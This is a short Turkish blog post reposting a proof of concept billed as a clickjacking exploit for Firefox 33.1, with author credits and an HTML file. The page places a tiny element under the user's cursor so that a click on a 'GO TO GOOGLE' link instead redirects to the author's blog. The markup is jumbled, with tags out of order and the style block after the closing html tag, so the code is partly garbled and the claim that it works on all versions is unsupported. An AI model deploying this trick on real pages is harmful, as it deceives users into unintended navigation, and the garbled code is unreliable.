15 Kasım 2014 Cumartesi

Mozilla Firefox 33.1 - Clickjacking Vulnerability Exploit

Mozilla Firefox 33.1 - Clickjacking Vulnerability Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author :  KnocKout & BARCOD3
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com & http://cyber-warrior.org
[~] Greetz: BARCOD3 , Septemb0x , _UnDeRTaKeR_   &    http://milw00rm.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : Mozilla Firefox
|~Version : 33.1 - All Version
|~Software: http://www.mozilla.org
|~Vulnerability Style : Clickjacking
|[~]Date : "12.11.2014"
|[~]Tested on : Mozilla Firefox 33.1 \ Kali Linux \ Windows 7 \ Windows 8
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ========================index.htm=======================================
 
    </style>
<body>
<span class="style2">Home Page</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.h4x0resec.blogspot.com';">Come here :) </div>
<p><strong>
  <script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.google.com.tr" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">GO TO GOOGLE</font></a></p>
</center>
<p><br>
</p>
</html>
<center>
<html>
<style type="text/css">
<!--
.style1 {
 font-size: 50px;
 font-weight: bold;
}
.style2 {
 color: #FF0000;
 font-weight: bold;
 font-size: 24px;
}
-->
</center>

Hiç yorum yok:

Yorum Gönder